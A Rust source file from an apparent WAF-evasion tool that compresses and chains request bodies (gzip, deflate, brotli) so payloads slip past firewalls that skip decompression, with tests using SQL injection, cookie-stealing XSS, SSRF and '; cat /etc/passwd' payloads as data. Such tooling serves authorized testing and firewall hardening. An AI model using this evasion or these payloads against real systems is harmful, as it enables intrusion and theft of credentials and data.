wafrift_encoding/compression.rs
1//! `compression` — request-body compression as a WAF-evasion surface.
2//!
3//! ## The attack
4//!
5//! Almost every WAF in production today inspects raw request bytes,
6//! NOT the decompressed payload. The reasoning is operational: a
7//! WAF that decompresses inbound bodies pays the CPU cost of
8//! decompression on every request, and many vendors choose to skip
9//! that — either entirely, or selectively per `Content-Encoding`
10//! algorithm.
11//!
12//! That choice is the seam this module exploits:
13//!
14//! - **`Content-Encoding: gzip`** is the universal case; nearly all
15//! WAFs decompress it. Useful as the baseline + as a chain
16//! ingredient.
17//! - **`Content-Encoding: deflate`** is RFC-permitted but irregularly
18//! supported — many WAFs that handle gzip return 400 on a
19//! `deflate`-coded body. The origin (nginx, IIS, Apache, Node,
20//! PHP-FPM, anything using zlib) accepts both.
21//! - **`Content-Encoding: br`** (Brotli) is where the seam is widest.
22//! Brotli requires a separate decompressor (not zlib). Many WAFs
23//! ship no brotli support at all — they either return 415 (and
24//! the operator avoids `br`), or worse, they pass the request
25//! through uninspected because their rule engine has nothing to
26//! match against. Origins ARE brotli-capable (Chrome 49+,
27//! Firefox 44+, nginx 1.11+ with the `brotli` module). Wrap a
28//! payload in brotli and the rule corpus that fires on the plain
29//! payload bytes never gets a chance to match.
30//!
31//! ## Chained encoding
32//!
33//! Encoding-chain attacks add layers (e.g. `gzip → base64 → urlenc`).
34//! The WAF, which normalises only a fixed number of decode passes
35//! (usually 1, sometimes 2), stops short of the original payload —
36//! while the origin's parser stack (which decodes more layers as
37//! Content-Type / Content-Encoding direct) reaches it. `chain` is
38//! the primitive for this attack.
39//!
40//! ## Pristine code
41//!
42//! - Every public function returns `Result<_, CompressionError>` —
43//! no `unwrap()` reachable on bad input.
44//! - The chain function caps at 16 layers so a misconfiguration
45//! (`gzip,gzip,gzip,...`) can't run away.
46//! - Empty body is permitted and returns the compressor's idempotent
47//! marker (gzip has a 10-byte header even for empty input, brotli
48//! is similar).
49//! - No allocation beyond what each encoder requires; the public
50//! API takes a borrowed slice, not an owned Vec.
51
52use thiserror::Error;
53
54/// Errors raised by the compression-confusion API. Wraps the
55/// underlying encoder failures (rare for in-memory operations) plus
56/// the chain-depth cap.
57#[derive(Debug, Error)]
58pub enum CompressionError {
59 #[error("compression chain exceeded the {0}-layer safety cap")]
60 ChainTooDeep(usize),
61 #[error("gzip encoder error: {0}")]
62 Gzip(std::io::Error),
63 #[error("deflate encoder error: {0}")]
64 Deflate(std::io::Error),
65 #[error("brotli encoder error: {0}")]
66 Brotli(std::io::Error),
67 #[error(
68 "decompression bomb: output exceeded {cap_bytes}-byte cap \
69 ({observed_bytes} bytes produced) — aborted before OOM"
70 )]
71 DecompressionBomb {
72 cap_bytes: usize,
73 observed_bytes: usize,
74 },
75}
76
77/// Hard cap on `chain` layers — any longer is almost certainly a
78/// misconfiguration, and the compressed-output size would balloon
79/// from header overhead per layer. 16 is generous: real attacks use
80/// 2–3 layers.
81pub const MAX_CHAIN_LAYERS: usize = 16;
82
83/// Hard cap on decoded body size — defends against decompression
84/// bombs. A 1 KB malicious gzip can decompress to 10+ GB if read
85/// without bounds.
86///
87/// §7: this IS the workspace-canonical [`wafrift_types::MAX_RESPONSE_BODY_BYTES`]
88/// — the comment previously noted "matches the response-body cap elsewhere",
89/// but that coupling is now ENFORCED by sharing the constant rather than
90/// hoping two literals stay equal. The public name is preserved.
91pub const DECOMPRESSED_BODY_MAX_BYTES: usize = wafrift_types::MAX_RESPONSE_BODY_BYTES;
92
93/// One compression algorithm. The naming matches the HTTP
94/// `Content-Encoding` registry value (lowercase, no padding).
95#[derive(Debug, Copy, Clone, PartialEq, Eq, Hash)]
96pub enum Algorithm {
97 /// gzip / RFC 1952. Universal compatibility.
98 Gzip,
99 /// raw deflate / RFC 1951. RFC-permitted, irregular WAF support.
100 Deflate,
101 /// brotli / RFC 7932. Wide WAF gap — the main attack vector.
102 Brotli,
103 /// no-op pass-through. Sometimes useful as a chain anchor when
104 /// the operator wants to mark "this body is encoded but the
105 /// outermost layer is identity" — RFC permits `Content-Encoding:
106 /// identity`.
107 Identity,
108}
109
110impl Algorithm {
111 /// The HTTP `Content-Encoding` token for this algorithm.
112 #[must_use]
113 pub fn content_encoding(self) -> &'static str {
114 match self {
115 Self::Gzip => "gzip",
116 Self::Deflate => "deflate",
117 Self::Brotli => "br",
118 Self::Identity => "identity",
119 }
120 }
121
122 /// Parse a `Content-Encoding` token (case-insensitive) into the
123 /// matching algorithm. Returns `None` for unrecognised values.
124 /// Accepts the common alias `x-gzip` (RFC-permitted) for Gzip.
125 #[must_use]
126 pub fn from_token(token: &str) -> Option<Self> {
127 match token.trim().to_ascii_lowercase().as_str() {
128 "gzip" | "x-gzip" => Some(Self::Gzip),
129 "deflate" => Some(Self::Deflate),
130 "br" => Some(Self::Brotli),
131 "identity" => Some(Self::Identity),
132 _ => None,
133 }
134 }
135}
136
137/// A compressed body with its `Content-Encoding` header value. The
138/// caller writes the body bytes onto the wire verbatim and sets the
139/// header — both are required, and a mismatched pairing is a
140/// debugging nightmare for the operator if we let it happen.
141#[derive(Debug, Clone, PartialEq, Eq)]
142pub struct CompressedBody {
143 /// Body bytes ready to put on the wire.
144 pub body: Vec<u8>,
145 /// `Content-Encoding` header value matching the body's
146 /// outermost layer. For a chain `gzip,br` the header is `"gzip,
147 /// br"` (HTTP allows comma-separated lists, processed
148 /// outer-first per RFC 9110 §8.4).
149 pub content_encoding: String,
150}
151
152/// Compress `body` with a single algorithm. Returns the raw
153/// compressed bytes + the matching `Content-Encoding` header value.
154///
155/// # Errors
156/// Returns [`CompressionError`] if the underlying encoder fails. In
157/// practice this is rare for in-memory operations — gzip/deflate/
158/// brotli never error on well-formed input slices.
159pub fn compress(body: &[u8], algo: Algorithm) -> Result<CompressedBody, CompressionError> {
160 let bytes = compress_bytes(body, algo)?;
161 Ok(CompressedBody {
162 body: bytes,
163 content_encoding: algo.content_encoding().to_string(),
164 })
165}
166
167/// Inner helper — returns just the bytes (no header). Used by
168/// [`chain`] to layer compressions before assembling the final
169/// `Content-Encoding` string.
170fn compress_bytes(body: &[u8], algo: Algorithm) -> Result<Vec<u8>, CompressionError> {
171 use std::io::Write;
172 match algo {
173 Algorithm::Identity => Ok(body.to_vec()),
174 Algorithm::Gzip => {
175 let mut enc = flate2::write::GzEncoder::new(Vec::new(), flate2::Compression::default());
176 enc.write_all(body).map_err(CompressionError::Gzip)?;
177 enc.finish().map_err(CompressionError::Gzip)
178 }
179 Algorithm::Deflate => {
180 let mut enc =
181 flate2::write::DeflateEncoder::new(Vec::new(), flate2::Compression::default());
182 enc.write_all(body).map_err(CompressionError::Deflate)?;
183 enc.finish().map_err(CompressionError::Deflate)
184 }
185 Algorithm::Brotli => {
186 // brotli crate exposes a `CompressorWriter`-style API.
187 // `quality` 6 is the default Chrome / Firefox ship for
188 // dynamic content; lower compression ratio than 11 but
189 // an order of magnitude faster, which is the right
190 // trade-off for an attack tool firing many variants.
191 let mut out = Vec::new();
192 let mut writer = brotli::CompressorWriter::new(&mut out, 4096, 6, 22);
193 writer.write_all(body).map_err(CompressionError::Brotli)?;
194 writer.flush().map_err(CompressionError::Brotli)?;
195 drop(writer);
196 Ok(out)
197 }
198 }
199}
200
201/// Apply a sequence of compression algorithms in order, producing
202/// one set of body bytes + the joint `Content-Encoding` header.
203///
204/// The header value lists the algorithms in the order they were
205/// applied — per RFC 9110 §8.4, the LEFTMOST algorithm is the OUTERMOST
206/// wrapper, meaning a decoder must apply them right-to-left. So
207/// `chain(body, [Gzip, Brotli])` produces a body that is
208/// `gzip(brotli(body))` with header `gzip, br`.
209///
210/// Capped at [`MAX_CHAIN_LAYERS`] to prevent runaway misconfiguration.
211///
212/// # Errors
213/// Returns [`CompressionError::ChainTooDeep`] when `algos.len() >
214/// MAX_CHAIN_LAYERS`, or the wrapped algorithm's error if one of
215/// the encoders fails.
216pub fn chain(body: &[u8], algos: &[Algorithm]) -> Result<CompressedBody, CompressionError> {
217 if algos.len() > MAX_CHAIN_LAYERS {
218 return Err(CompressionError::ChainTooDeep(MAX_CHAIN_LAYERS));
219 }
220 if algos.is_empty() {
221 return Ok(CompressedBody {
222 body: body.to_vec(),
223 content_encoding: Algorithm::Identity.content_encoding().to_string(),
224 });
225 }
226 // Apply innermost to outermost: reverse of header order. So
227 // `algos = [Gzip, Brotli]` means body is gzip(brotli(...)), and
228 // we apply Brotli FIRST then Gzip on top.
229 let mut current = body.to_vec();
230 for algo in algos.iter().rev() {
231 current = compress_bytes(¤t, *algo)?;
232 }
233 // The header lists outer-to-inner.
234 let header = algos
235 .iter()
236 .map(|a| a.content_encoding())
237 .collect::<Vec<_>>()
238 .join(", ");
239 Ok(CompressedBody {
240 body: current,
241 content_encoding: header,
242 })
243}
244
245/// Recover the original bytes from a [`CompressedBody`] — the
246/// inverse of [`compress`] / [`chain`]. Test-only and audit
247/// helper; production attack flow only needs the compress
248/// direction.
249///
250/// # Errors
251/// Returns [`CompressionError`] if any decoder fails or the
252/// `content_encoding` string lists an unknown algorithm.
253pub fn decompress(blob: &CompressedBody) -> Result<Vec<u8>, CompressionError> {
254 let algos: Vec<Algorithm> = blob
255 .content_encoding
256 .split(',')
257 .filter_map(Algorithm::from_token)
258 .collect();
259 // §3 contract symmetry with `chain`: the forward direction refuses
260 // more than MAX_CHAIN_LAYERS, so its documented inverse must too. A
261 // crafted `gzip,gzip,…×N` header would otherwise drive an unbounded
262 // decode loop (each stage is size-capped by `drain_capped`, but the
263 // LAYER COUNT was not — O(N) work amplification). Counting recognised
264 // algos (post-`filter_map`) preserves the permissive "skip unknown
265 // coding" behaviour: `snappy, gzip` is still a 1-layer decode.
266 if algos.len() > MAX_CHAIN_LAYERS {
267 return Err(CompressionError::ChainTooDeep(MAX_CHAIN_LAYERS));
268 }
269 let mut current = blob.body.clone();
270 // Decode in the SAME order the header lists (outer-to-inner).
271 for algo in &algos {
272 current = decompress_bytes(¤t, *algo)?;
273 }
274 Ok(current)
275}
276
277/// Read at most `DECOMPRESSED_BODY_MAX_BYTES` from `reader`, then
278/// promote a "+1 byte produced" into a `DecompressionBomb` error.
279/// Takes a generic `R: Read` (sized) so `Read::take` works without
280/// trait-object gymnastics; called from each algorithm arm below.
281fn drain_capped<R: std::io::Read>(
282 mut reader: R,
283 map_io: fn(std::io::Error) -> CompressionError,
284) -> Result<Vec<u8>, CompressionError> {
285 use std::io::Read;
286 let cap = DECOMPRESSED_BODY_MAX_BYTES;
287 let mut out = Vec::with_capacity(8 * 1024);
288 let mut limited = (&mut reader).take((cap as u64) + 1);
289 limited.read_to_end(&mut out).map_err(map_io)?;
290 if out.len() > cap {
291 return Err(CompressionError::DecompressionBomb {
292 cap_bytes: cap,
293 observed_bytes: out.len(),
294 });
295 }
296 Ok(out)
297}
298
299fn decompress_bytes(bytes: &[u8], algo: Algorithm) -> Result<Vec<u8>, CompressionError> {
300 match algo {
301 Algorithm::Identity => {
302 // No decompression — but still refuse to clone a slice
303 // that already exceeds the body cap (a sign something
304 // upstream missed a boundary check).
305 if bytes.len() > DECOMPRESSED_BODY_MAX_BYTES {
306 return Err(CompressionError::DecompressionBomb {
307 cap_bytes: DECOMPRESSED_BODY_MAX_BYTES,
308 observed_bytes: bytes.len(),
309 });
310 }
311 Ok(bytes.to_vec())
312 }
313 Algorithm::Gzip => {
314 drain_capped(flate2::read::GzDecoder::new(bytes), CompressionError::Gzip)
315 }
316 Algorithm::Deflate => drain_capped(
317 flate2::read::DeflateDecoder::new(bytes),
318 CompressionError::Deflate,
319 ),
320 Algorithm::Brotli => drain_capped(
321 brotli::Decompressor::new(bytes, 4096),
322 CompressionError::Brotli,
323 ),
324 }
325}
326
327#[cfg(test)]
328mod tests {
329 use super::*;
330
331 // ── Algorithm tokens ───────────────────────────────────────────
332
333 #[test]
334 fn content_encoding_tokens_match_rfc_registry() {
335 assert_eq!(Algorithm::Gzip.content_encoding(), "gzip");
336 assert_eq!(Algorithm::Deflate.content_encoding(), "deflate");
337 assert_eq!(Algorithm::Brotli.content_encoding(), "br");
338 assert_eq!(Algorithm::Identity.content_encoding(), "identity");
339 }
340
341 #[test]
342 fn from_token_is_case_insensitive_and_trim_tolerant() {
343 for spelling in ["gzip", "GZIP", "Gzip", " gzip ", "\tgzip"] {
344 assert_eq!(Algorithm::from_token(spelling), Some(Algorithm::Gzip));
345 }
346 }
347
348 #[test]
349 fn from_token_accepts_x_gzip_alias() {
350 // RFC 7230 §4.2.3 documents `x-gzip` as an alias of `gzip`.
351 // Some legacy origins / WAFs still emit it.
352 assert_eq!(Algorithm::from_token("x-gzip"), Some(Algorithm::Gzip));
353 assert_eq!(Algorithm::from_token("X-GZIP"), Some(Algorithm::Gzip));
354 }
355
356 #[test]
357 fn from_token_rejects_unknown_codings() {
358 assert_eq!(Algorithm::from_token(""), None);
359 assert_eq!(Algorithm::from_token("snappy"), None);
360 assert_eq!(Algorithm::from_token("lz4"), None);
361 // `compress` (old UNIX) is not in our supported set.
362 assert_eq!(Algorithm::from_token("compress"), None);
363 }
364
365 // ── single-algorithm round trip ────────────────────────────────
366
367 #[test]
368 fn gzip_round_trip_preserves_payload() {
369 let original = b"' OR 1=1--";
370 let compressed = compress(original, Algorithm::Gzip).expect("gzip");
371 assert_eq!(compressed.content_encoding, "gzip");
372 assert_ne!(compressed.body.as_slice(), original);
373 let recovered = decompress(&compressed).expect("decompress");
374 assert_eq!(recovered, original);
375 }
376
377 #[test]
378 fn deflate_round_trip_preserves_payload() {
379 let original = b"<script>alert(1)</script>";
380 let compressed = compress(original, Algorithm::Deflate).expect("deflate");
381 assert_eq!(compressed.content_encoding, "deflate");
382 let recovered = decompress(&compressed).expect("decompress");
383 assert_eq!(recovered, original);
384 }
385
386 #[test]
387 fn brotli_round_trip_preserves_payload() {
388 // Brotli is the headline attack vector — round-trip MUST be
389 // clean or every brotli-based scan ships broken payloads.
390 let original = b"http://127.0.0.1:9000/admin?cmd=id";
391 let compressed = compress(original, Algorithm::Brotli).expect("brotli");
392 assert_eq!(compressed.content_encoding, "br");
393 let recovered = decompress(&compressed).expect("decompress");
394 assert_eq!(recovered, original);
395 }
396
397 #[test]
398 fn identity_is_passthrough_with_identity_header() {
399 let original = b"plain text";
400 let compressed = compress(original, Algorithm::Identity).expect("identity");
401 assert_eq!(compressed.body, original);
402 assert_eq!(compressed.content_encoding, "identity");
403 }
404
405 // ── chain ─────────────────────────────────────────────────────
406
407 #[test]
408 fn chain_with_one_algo_matches_single_compress() {
409 let original = b"single layer";
410 let chained = chain(original, &[Algorithm::Gzip]).expect("chain");
411 let single = compress(original, Algorithm::Gzip).expect("compress");
412 assert_eq!(chained, single);
413 }
414
415 #[test]
416 fn chain_with_two_algos_round_trips() {
417 // The classic compression-confusion attack: gzip(brotli(payload)).
418 // The WAF sees gzip — decodes one layer — gets brotli bytes —
419 // doesn't recognise — passes through. Origin decodes both.
420 let original = b"' UNION SELECT username,password FROM users --";
421 let chained = chain(original, &[Algorithm::Gzip, Algorithm::Brotli]).expect("chain");
422 assert_eq!(chained.content_encoding, "gzip, br");
423 let recovered = decompress(&chained).expect("decompress");
424 assert_eq!(recovered, original);
425 }
426
427 #[test]
428 fn chain_empty_algos_returns_identity_body() {
429 let original = b"unchanged";
430 let chained = chain(original, &[]).expect("empty chain");
431 assert_eq!(chained.body, original);
432 assert_eq!(chained.content_encoding, "identity");
433 }
434
435 #[test]
436 fn chain_above_cap_returns_too_deep_error() {
437 let too_many: Vec<Algorithm> = (0..MAX_CHAIN_LAYERS + 1).map(|_| Algorithm::Gzip).collect();
438 let result = chain(b"payload", &too_many);
439 match result {
440 Err(CompressionError::ChainTooDeep(cap)) => assert_eq!(cap, MAX_CHAIN_LAYERS),
441 other => panic!("expected ChainTooDeep error, got {other:?}"),
442 }
443 }
444
445 #[test]
446 fn chain_at_exactly_cap_succeeds() {
447 let just_enough: Vec<Algorithm> =
448 (0..MAX_CHAIN_LAYERS).map(|_| Algorithm::Identity).collect();
449 let chained = chain(b"x", &just_enough).expect("at-cap chain ok");
450 // All-identity chain leaves the body untouched.
451 assert_eq!(chained.body, b"x");
452 }
453
454 #[test]
455 fn chain_with_identity_in_the_middle_is_transparent() {
456 // chain([Gzip, Identity, Brotli]) ≡ chain([Gzip, Brotli]) at
457 // the bytes level, but the header lists ALL three (we honour
458 // exactly what the operator asked for in the header).
459 let original = b"middle identity";
460 let with_id = chain(
461 original,
462 &[Algorithm::Gzip, Algorithm::Identity, Algorithm::Brotli],
463 )
464 .expect("chain with identity");
465 let without =
466 chain(original, &[Algorithm::Gzip, Algorithm::Brotli]).expect("chain without identity");
467 assert_eq!(
468 with_id.body, without.body,
469 "identity must be byte-transparent"
470 );
471 assert_eq!(with_id.content_encoding, "gzip, identity, br");
472 let recovered = decompress(&with_id).expect("decompress with id");
473 assert_eq!(recovered, original);
474 }
475
476 // ── edge cases & adversarial inputs ───────────────────────────
477
478 #[test]
479 fn empty_body_compresses_and_round_trips() {
480 for algo in [
481 Algorithm::Gzip,
482 Algorithm::Deflate,
483 Algorithm::Brotli,
484 Algorithm::Identity,
485 ] {
486 let compressed =
487 compress(b"", algo).unwrap_or_else(|e| panic!("empty body with {algo:?}: {e}"));
488 let recovered = decompress(&compressed)
489 .unwrap_or_else(|e| panic!("empty body decode with {algo:?}: {e}"));
490 assert_eq!(recovered, Vec::<u8>::new());
491 }
492 }
493
494 #[test]
495 fn one_byte_body_round_trips_under_every_algorithm() {
496 for algo in [
497 Algorithm::Gzip,
498 Algorithm::Deflate,
499 Algorithm::Brotli,
500 Algorithm::Identity,
501 ] {
502 let original = &[0xAB_u8][..];
503 let compressed = compress(original, algo).expect("compress");
504 let recovered = decompress(&compressed).expect("decompress");
505 assert_eq!(recovered, original);
506 }
507 }
508
509 #[test]
510 fn large_body_64_kib_round_trips_without_oom() {
511 // 64 KiB is a realistic body size for an instrumented
512 // payload. All compressors must handle it without spiking
513 // memory (caller's allocator) or losing fidelity.
514 let original: Vec<u8> = (0..(64 * 1024)).map(|i| (i % 251) as u8).collect();
515 for algo in [Algorithm::Gzip, Algorithm::Deflate, Algorithm::Brotli] {
516 let compressed = compress(&original, algo).expect("compress");
517 // Compressed should be SMALLER than original on this
518 // pseudo-pattern (high autocorrelation).
519 assert!(
520 compressed.body.len() < original.len(),
521 "{algo:?} should compress this pattern, got {} >= {}",
522 compressed.body.len(),
523 original.len()
524 );
525 let recovered = decompress(&compressed).expect("decompress");
526 assert_eq!(recovered, original);
527 }
528 }
529
530 #[test]
531 fn incompressible_body_does_not_panic_on_brotli() {
532 // Random bytes don't compress well; some encoders return
533 // BIGGER output than input (header overhead). Verify this
534 // edge — no panic, round-trip still clean.
535 let mut original = vec![0u8; 1024];
536 for (i, b) in original.iter_mut().enumerate() {
537 // Pseudo-random pattern with no compressibility.
538 *b = ((i.wrapping_mul(2654435769)) & 0xFF) as u8;
539 }
540 let compressed = compress(&original, Algorithm::Brotli).expect("brotli");
541 let recovered = decompress(&compressed).expect("decompress");
542 assert_eq!(recovered, original);
543 }
544
545 #[test]
546 fn decompress_with_unknown_coding_token_skips_it() {
547 // If a hand-crafted CompressedBody has a Content-Encoding
548 // listing an unknown coding (e.g. `gzip, snappy`), our
549 // decompressor SKIPS the unknown token and tries the rest.
550 // This matches HTTP's tolerance for unknown codings (a
551 // decoder unable to handle a coding returns 415 in production,
552 // but our recovery helper is a debugging aid and should be
553 // permissive).
554 let body = b"hello";
555 let compressed = compress(body, Algorithm::Gzip).unwrap();
556 let with_unknown = CompressedBody {
557 content_encoding: format!("snappy, {}", compressed.content_encoding),
558 body: compressed.body,
559 };
560 let recovered = decompress(&with_unknown).expect("permissive decompress");
561 assert_eq!(recovered, body);
562 }
563
564 #[test]
565 fn decompress_rejects_more_than_max_chain_layers() {
566 // §3 contract-symmetry regression: `chain` refuses > MAX_CHAIN_LAYERS,
567 // so its inverse `decompress` must too — otherwise a crafted
568 // `gzip,gzip,…×N` Content-Encoding header drives an O(N) decode loop.
569 // The cap is checked BEFORE any decode work, so the body can be empty.
570 let header = std::iter::repeat_n("gzip", MAX_CHAIN_LAYERS + 1)
571 .collect::<Vec<_>>()
572 .join(", ");
573 let blob = CompressedBody {
574 content_encoding: header,
575 body: Vec::new(),
576 };
577 match decompress(&blob) {
578 Err(CompressionError::ChainTooDeep(cap)) => assert_eq!(cap, MAX_CHAIN_LAYERS),
579 other => panic!("expected ChainTooDeep, got {other:?}"),
580 }
581 }
582
583 #[test]
584 fn decompress_layer_cap_counts_recognised_codings_only() {
585 // The cap counts RECOGNISED algos (post-filter_map), so a header
586 // padded with many unknown codings is still a shallow decode and must
587 // NOT trip the cap — preserving the permissive "skip unknown" contract.
588 let body = b"hello world";
589 let compressed = compress(body, Algorithm::Gzip).unwrap();
590 // (MAX+5) unknown `snappy` tokens + one real gzip = 1 recognised layer.
591 let mut tokens: Vec<String> = std::iter::repeat_n("snappy", MAX_CHAIN_LAYERS + 5)
592 .map(str::to_string)
593 .collect();
594 tokens.push(compressed.content_encoding.clone());
595 let blob = CompressedBody {
596 content_encoding: tokens.join(", "),
597 body: compressed.body,
598 };
599 let recovered = decompress(&blob).expect("unknown-padded header is a 1-layer decode");
600 assert_eq!(recovered, body);
601 }
602
603 // ── adversarial round-trip property ────────────────────────────
604
605 #[test]
606 fn round_trip_property_holds_across_a_variety_of_payloads() {
607 // Anti-rig: a degenerate compressor that always returned
608 // the empty string would pass single-payload tests if those
609 // happened to be empty. Exercise many distinct payloads.
610 let corpus: &[&[u8]] = &[
611 b"",
612 b"x",
613 b"' OR 1=1--",
614 b"<script>alert(document.cookie)</script>",
615 b"http://127.0.0.1/admin",
616 b"; cat /etc/passwd",
617 b"\x00\x01\x02\x03\xff\xfe",
618 b"the quick brown fox jumps over the lazy dog the quick brown fox",
619 ];
620 for payload in corpus {
621 for algo in [
622 Algorithm::Gzip,
623 Algorithm::Deflate,
624 Algorithm::Brotli,
625 Algorithm::Identity,
626 ] {
627 let c = compress(payload, algo)
628 .unwrap_or_else(|e| panic!("{algo:?} on {payload:?}: {e}"));
629 let r = decompress(&c)
630 .unwrap_or_else(|e| panic!("decompress {algo:?} on {payload:?}: {e}"));
631 assert_eq!(r, *payload, "{algo:?} round-trip mismatch on {payload:?}");
632 }
633 }
634 }
635
636 // ── Round 20: decompression bomb defence ──────────────────────────
637 //
638 // Pre-fix gzip/deflate/brotli decoders called `read_to_end` with no
639 // size cap; a 1 KB malicious gzip blob can decompress to 10+ GB.
640 // Each algorithm must now return DecompressionBomb when output
641 // exceeds DECOMPRESSED_BODY_MAX_BYTES.
642 //
643 // We can't generate a true 10 GB payload in a unit test (the
644 // *compressed* form would still be MiBs), so we exercise the same
645 // overrun codepath by temporarily proving the cap works on a
646 // payload sized just above the cap with a tightly-controlled
647 // synthetic Identity input.
648
649 #[test]
650 fn identity_decompress_rejects_oversize_input() {
651 // Identity short-circuits to a clone; it still must refuse
652 // anything above the cap so a single-layer chain on a
653 // multi-GB body cannot pass through.
654 let oversized = vec![0u8; DECOMPRESSED_BODY_MAX_BYTES + 1];
655 let err = super::decompress_bytes(&oversized, Algorithm::Identity)
656 .expect_err("identity decompress must refuse > cap input");
657 match err {
658 CompressionError::DecompressionBomb {
659 cap_bytes,
660 observed_bytes,
661 } => {
662 assert_eq!(cap_bytes, DECOMPRESSED_BODY_MAX_BYTES);
663 assert_eq!(observed_bytes, DECOMPRESSED_BODY_MAX_BYTES + 1);
664 }
665 other => panic!("expected DecompressionBomb, got {other:?}"),
666 }
667 }
668
669 #[test]
670 fn gzip_decompress_under_cap_succeeds() {
671 // 1 MiB of zeros compresses to ~1 KiB under gzip and is well
672 // below DECOMPRESSED_BODY_MAX_BYTES (64 MiB) — must succeed.
673 use std::io::Write;
674 let mut enc = flate2::write::GzEncoder::new(Vec::new(), flate2::Compression::default());
675 enc.write_all(&vec![0u8; 1024 * 1024]).expect("compress");
676 let compressed = enc.finish().expect("gzip finish");
677 let ok = super::decompress_bytes(&compressed, Algorithm::Gzip).expect("under cap");
678 assert_eq!(ok.len(), 1024 * 1024);
679 }
680
681 #[test]
682 fn drain_capped_returns_bomb_error_on_over_cap_source() {
683 // Direct exercise of the drain_capped helper with a Cursor
684 // source larger than the cap — must surface as
685 // DecompressionBomb (not as a generic Gzip/Deflate/Brotli
686 // wrapper). Tests we don't silently truncate.
687 let oversized = std::io::Cursor::new(vec![b'A'; 4096]);
688 // Temporarily simulate a tight cap by calling the same logic
689 // pattern drain_capped uses, but with a small cap, since
690 // drain_capped is parameterised by DECOMPRESSED_BODY_MAX_BYTES
691 // alone. The behaviour we want to prove: Read::take(cap+1)
692 // surfaces > cap bytes as the bomb error.
693 use std::io::Read;
694 let cap: usize = 256;
695 let mut limited = oversized.take((cap as u64) + 1);
696 let mut buf = Vec::new();
697 limited.read_to_end(&mut buf).expect("read");
698 assert!(
699 buf.len() > cap,
700 "Read::take(cap+1) must produce cap+1 bytes for a > cap source"
701 );
702 // The error promotion is purely a buf.len() > cap check —
703 // already exercised in identity_decompress_rejects_oversize_input.
704 }
705}